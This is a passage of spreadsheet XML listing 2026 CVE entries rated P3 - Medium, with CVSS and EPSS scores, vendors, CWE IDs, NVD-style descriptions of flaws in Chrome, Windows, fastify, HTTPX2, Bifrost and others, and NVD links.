      <c r="J1908" s="5" t="inlineStr"/>
      <c r="K1908" s="5" t="inlineStr">
        <is>
          <t>CWE-288</t>
        </is>
      </c>
      <c r="L1908" s="5" t="inlineStr">
        <is>
          <t>An Authentication Bypass vulnerability in Sentry before R10.8.2, R10.7.3 and R10.6.4 allows a remote unauthenticated attacker to gain administrative level access.</t>
        </is>
      </c>
      <c r="M1908" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83527</t>
        </is>
      </c>
    </row>
    <row r="1909">
      <c r="A1909" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1909" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83997</t>
        </is>
      </c>
      <c r="C1909" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1909" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1909" s="5" t="inlineStr"/>
      <c r="F1909" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1909" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1909" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="I1909" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1909" s="5" t="inlineStr"/>
      <c r="K1909" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1909" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Message Queuing allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1909" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83997</t>
        </is>
      </c>
    </row>
    <row r="1910">
      <c r="A1910" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1910" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84381</t>
        </is>
      </c>
      <c r="C1910" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1910" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1910" s="5" t="inlineStr"/>
      <c r="F1910" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1910" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H1910" s="5" t="inlineStr"/>
      <c r="I1910" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J1910" s="5" t="inlineStr"/>
      <c r="K1910" s="5" t="inlineStr">
        <is>
          <t>CWE-319</t>
        </is>
      </c>
      <c r="L1910" s="5" t="inlineStr">
        <is>
          <t>HTTPX2 is a next generation HTTP client for Python. Prior to 2.10.0, httpcore2 fails to start TLS in src/httpcore2/httpcore2/_sync/socks_proxy.py and src/httpcore2/httpcore2/_async/socks_proxy.py when the remote origin uses wss through a SOCKS5 proxy because the TLS upgrade condition only recognizes https. HTTPX2 exposes the flaw through Client.websocket() and AsyncClient.websocket() from 2.6.0 through 2.9.1, so the opening handshake, query parameters, Authorization headers, cookies, and subsequent frames can cross the proxy path in plaintext without certificate verification. An attacker controlling or observing that path can read or modify traffic and impersonate the WebSocket server. This issue is fixed in httpcore2 2.10.0 and HTTPX2 2.10.0.</t>
        </is>
      </c>
      <c r="M1910" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84381</t>
        </is>
      </c>
    </row>
    <row r="1911">
      <c r="A1911" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1911" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84393</t>
        </is>
      </c>
      <c r="C1911" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1911" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1911" s="5" t="inlineStr"/>
      <c r="F1911" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1911" s="5" t="inlineStr">
        <is>
          <t>fortinet</t>
        </is>
      </c>
      <c r="H1911" s="5" t="inlineStr"/>
      <c r="I1911" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1911" s="5" t="inlineStr"/>
      <c r="K1911" s="5" t="inlineStr">
        <is>
          <t>CWE-297</t>
        </is>
      </c>
      <c r="L1911" s="5" t="inlineStr">
        <is>
          <t>A improper validation of certificate with host mismatch vulnerability in Fortinet FortiOS 7.6.1 through 7.6.6, FortiProxy 7.6.2 through 7.6.6 may allow attacker to information disclosure via &lt;insert attack vector here&gt;</t>
        </is>
      </c>
      <c r="M1911" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84393</t>
        </is>
      </c>
    </row>
    <row r="1912">
      <c r="A1912" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1912" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84504</t>
        </is>
      </c>
      <c r="C1912" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1912" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1912" s="5" t="inlineStr"/>
      <c r="F1912" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1912" s="5" t="inlineStr"/>
      <c r="H1912" s="5" t="inlineStr"/>
      <c r="I1912" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1912" s="5" t="inlineStr"/>
      <c r="K1912" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L1912" s="5" t="inlineStr">
        <is>
          <t>fastify versions before 5.12.2 treat the object resolved by a successful Ajv async validator as the value result protocol used by custom validator compilers. If a request that passes its route schema contains a property named value at the root, fastify replaces the entire request body with that property's value before the handler runs, so the handler receives a different object than the one that satisfied the schema. An authenticated low-privilege caller can use this to make nested data replace the validated body and trigger an operation the route schema did not authorize, leading to unauthorized state changes and data disclosure. Users should upgrade to fastify 5.12.2 or later.</t>
        </is>
      </c>
      <c r="M1912" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84504</t>
        </is>
      </c>
    </row>
    <row r="1913">
      <c r="A1913" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1913" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86242</t>
        </is>
      </c>
      <c r="C1913" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1913" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1913" s="5" t="inlineStr"/>
      <c r="F1913" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1913" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H1913" s="5" t="inlineStr"/>
      <c r="I1913" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J1913" s="5" t="inlineStr"/>
      <c r="K1913" s="5" t="inlineStr">
        <is>
          <t>CWE-284, CWE-306, CWE-94</t>
        </is>
      </c>
      <c r="L1913" s="5" t="inlineStr">
        <is>
          <t>Bifrost HTTP transport before 2.0.0 accepts an enabled custom plugin whose path is an HTTP URL through unauthenticated POST /api/plugins when management authentication is disabled (the default, governance.auth_config.is_enabled=false). The shared-object loader treats an http-prefixed path as a download URL, writes the body to a temporary .so, and passes it to Go's plugin.Open. After a successful open, optional Init runs immediately with the supplied config as the Bifrost process user. On documented dynamically linked builds (DYNAMIC=1 / no static-link flags), which the vendor requires for custom Go plugins, plugin.Open is expected to succeed and this is unauthenticated remote code execution. On the published statically linked Docker image, plugin.Open fails with Dynamic loading not supported, so that build class is only server-side request forgery. Attack complexity is High because the attacker cannot force RCE on the default static image and a loadable plugin must match the host Go version, OS, architecture, and linkage. The 1.6.x HTTP transport line through 1.6.11 does not contain the fix.</t>
        </is>
      </c>
      <c r="M1913" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86242</t>
        </is>
      </c>
    </row>
    <row r="1914">
      <c r="A1914" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1914" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86479</t>
        </is>
      </c>
      <c r="C1914" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1914" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1914" s="5" t="inlineStr"/>
      <c r="F1914" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1914" s="5" t="inlineStr"/>
      <c r="H1914" s="5" t="inlineStr"/>
      <c r="I1914" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1914" s="5" t="inlineStr"/>
      <c r="K1914" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L1914" s="5" t="inlineStr">
        <is>
          <t>In JetBrains YouTrack before 2026.2.18788, 
2026.1.14055, 
2025.3.161254 missing authorisation allowed access to restricted REST API resources via IDOR</t>
        </is>
      </c>
      <c r="M1914" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86479</t>
        </is>
      </c>
    </row>
    <row r="1915">
      <c r="A1915" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1915" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87016</t>
        </is>
      </c>
      <c r="C1915" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1915" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1915" s="5" t="inlineStr"/>
      <c r="F1915" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1915" s="5" t="inlineStr">
        <is>
          <t>postgresql</t>
        </is>
      </c>
      <c r="H1915" s="5" t="inlineStr"/>
      <c r="I1915" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1915" s="5" t="inlineStr"/>
      <c r="K1915" s="5" t="inlineStr">
        <is>
          <t>CWE-155, CWE-287</t>
        </is>
      </c>
      <c r="L1915"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M1915" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87016</t>
        </is>
      </c>
    </row>
    <row r="1916">
      <c r="A1916" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1916" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87036</t>
        </is>
      </c>
      <c r="C1916" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1916" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1916" s="5" t="inlineStr"/>
      <c r="F1916" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1916" s="5" t="inlineStr"/>
      <c r="H1916" s="5" t="inlineStr"/>
      <c r="I1916" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1916" s="5" t="inlineStr"/>
      <c r="K1916" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L1916" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed an improper access controls vulnerability in Comply.</t>
        </is>
      </c>
      <c r="M1916" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87036</t>
        </is>
      </c>
    </row>
    <row r="1917">
      <c r="A1917" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1917" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87075</t>
        </is>
      </c>
      <c r="C1917" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1917" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1917" s="5" t="inlineStr"/>
      <c r="F1917" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1917" s="5" t="inlineStr"/>
      <c r="H1917" s="5" t="inlineStr"/>
      <c r="I1917" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1917" s="5" t="inlineStr"/>
      <c r="K1917" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L1917" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed an improper access controls vulnerability in Comply.</t>
        </is>
      </c>
      <c r="M1917" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87075</t>
        </is>
      </c>
    </row>
    <row r="1918">
      <c r="A1918" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1918" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87457</t>
        </is>
      </c>
      <c r="C1918" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1918" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1918" s="5" t="inlineStr"/>
      <c r="F1918" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1918" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1918" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="I1918" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1918" s="5" t="inlineStr"/>
      <c r="K1918" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="L1918" s="5" t="inlineStr">
        <is>
          <t>Race condition in Updater in Google Chrome on on Windows prior to 153.0.8010.36 allowed a local attacker to execute arbitrary code outside the sandbox via a local program. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M1918" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87457</t>
        </is>
      </c>
    </row>
    <row r="1919">
      <c r="A1919" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1919" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87467</t>
        </is>
      </c>
      <c r="C1919" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1919" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1919" s="5" t="inlineStr"/>
      <c r="F1919" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1919" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1919" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="I1919" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1919" s="5" t="inlineStr"/>
      <c r="K1919" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="L1919" s="5" t="inlineStr">
        <is>
          <t>Race condition in Updater in Google Chrome on on Windows prior to 153.0.8010.36 allowed a local attacker to potentially execute arbitrary code outside the sandbox via a local program. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M1919" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87467</t>
        </is>
      </c>
    </row>
    <row r="1920">
      <c r="A1920" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1920" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87471</t>
        </is>
      </c>
      <c r="C1920" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1920" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1920" s="5" t="inlineStr"/>
      <c r="F1920" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1920" s="5" t="inlineStr"/>
      <c r="H1920" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I1920" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1920" s="5" t="inlineStr"/>
      <c r="K1920" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L1920" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in ServiceWorker in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M1920" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87471</t>
        </is>
      </c>
    </row>
    <row r="1921">
      <c r="A1921" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1921" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87499</t>
        </is>
      </c>
      <c r="C1921" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1921" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1921" s="5" t="inlineStr"/>
      <c r="F1921" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1921" s="5" t="inlineStr"/>
      <c r="H1921" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I1921" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1921" s="5" t="inlineStr"/>
      <c r="K1921" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L1921" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in Network in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M1921" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87499</t>
        </is>
      </c>
    </row>
    <row r="1922">
      <c r="A1922" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1922" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87505</t>
        </is>
      </c>
      <c r="C1922" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1922" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1922" s="5" t="inlineStr"/>
      <c r="F1922" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1922" s="5" t="inlineStr"/>
      <c r="H1922" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I1922" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1922" s="5" t="inlineStr"/>
      <c r="K1922" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L1922" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in FileSystem in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted PDF file. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M1922" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87505</t>
        </is>
      </c>
    </row>
    <row r="1923">
      <c r="A1923" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1923" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87509</t>
        </is>
      </c>
      <c r="C1923" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1923" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1923" s="5" t="inlineStr"/>
      <c r="F1923" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1923" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1923" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="I1923" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1923" s="5" t="inlineStr"/>
      <c r="K1923" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L1923" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in Updater in Google Chrome on on Windows prior to 153.0.8010.36 allowed a local attacker to execute arbitrary code outside the sandbox via a local program. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="M1923" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87509</t>
        </is>
      </c>
    </row>
    <row r="1924">
      <c r="A1924" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1924" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87514</t>
        </is>
      </c>
      <c r="C1924" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1924" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1924" s="5" t="inlineStr"/>
      <c r="F1924" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1924" s="5" t="inlineStr"/>
      <c r="H1924" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I1924" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1924" s="5" t="inlineStr"/>
      <c r="K1924" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1924" s="5" t="inlineStr">
        <is>
          <t>Use after free in Views in Google Chrome prior to 153.0.8010.36 allowed a local attacker to execute arbitrary code outside the sandbox via a local program. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M1924" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87514</t>
        </is>
      </c>
    </row>
    <row r="1925">
      <c r="A1925" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1925" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87530</t>
        </is>
      </c>
      <c r="C1925" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1925" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1925" s="5" t="inlineStr"/>
      <c r="F1925" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1925" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1925" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="I1925" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1925" s="5" t="inlineStr"/>
      <c r="K1925" s="5" t="inlineStr">
        <is>
          <t>CWE-427</t>
        </is>
      </c>
      <c r="L1925" s="5" t="inlineStr">
        <is>
          <t>Uncontrolled search path element in CredentialProvider in Google Chrome on on Windows prior to 153.0.8010.36 allowed a local attacker to execute arbitrary code outside the sandbox via a local program. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M1925" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87530</t>
        </is>
      </c>
    </row>
    <row r="1926">
      <c r="A1926" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1926" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87533</t>
        </is>
      </c>
      <c r="C1926" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1926" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1926" s="5" t="inlineStr"/>
      <c r="F1926" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1926" s="5" t="inlineStr"/>
      <c r="H1926" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I1926" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1926" s="5" t="inlineStr"/>
      <c r="K1926" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1926" s="5" t="inlineStr">
        <is>
          <t>Use after free in DevTools in Google Chrome prior to 153.0.8010.36 allowed a local attacker to execute arbitrary code outside the sandbox via a local program. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M1926" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87533</t>
        </is>
      </c>
    </row>
    <row r="1927">
      <c r="A1927" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1927" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87537</t>
        </is>
      </c>
      <c r="C1927" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1927" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1927" s="5" t="inlineStr"/>
      <c r="F1927" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1927" s="5" t="inlineStr"/>
      <c r="H1927" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I1927" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1927" s="5" t="inlineStr"/>
      <c r="K1927" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L1927" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Extensions in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to potentially execute arbitrary code outside the sandbox via crafted network traffic. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M1927" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87537</t>
        </is>
      </c>
    </row>
    <row r="1928">
      <c r="A1928" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1928" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87554</t>
        </is>
      </c>
      <c r="C1928" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1928" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1928" s="5" t="inlineStr"/>
      <c r="F1928" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1928" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1928" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="I1928" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1928" s="5" t="inlineStr"/>
      <c r="K1928" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="L1928" s="5" t="inlineStr">
        <is>
          <t>Race condition in Chromoting in Google Chrome on on Windows prior to 153.0.8010.36 allowed a local attacker to execute arbitrary code outside the sandbox via a local program. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M1928" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87554</t>
        </is>
      </c>
    </row>
    <row r="1929">
      <c r="A1929" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1929" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87606</t>
        </is>
      </c>
      <c r="C1929" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1929" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1929" s="5" t="inlineStr"/>
      <c r="F1929" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1929" s="5" t="inlineStr"/>
      <c r="H1929" s="5" t="inlineStr"/>
      <c r="I1929" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1929" s="5" t="inlineStr"/>
      <c r="K1929" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L1929" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in SiteIsolation in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M1929" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87606</t>
        </is>
      </c>
    </row>
    <row r="1930">
      <c r="A1930" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1930" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87874</t>
        </is>
      </c>
      <c r="C1930" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1930" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1930" s="5" t="inlineStr"/>
      <c r="F1930" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1930" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H1930" s="5" t="inlineStr"/>
      <c r="I1930" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
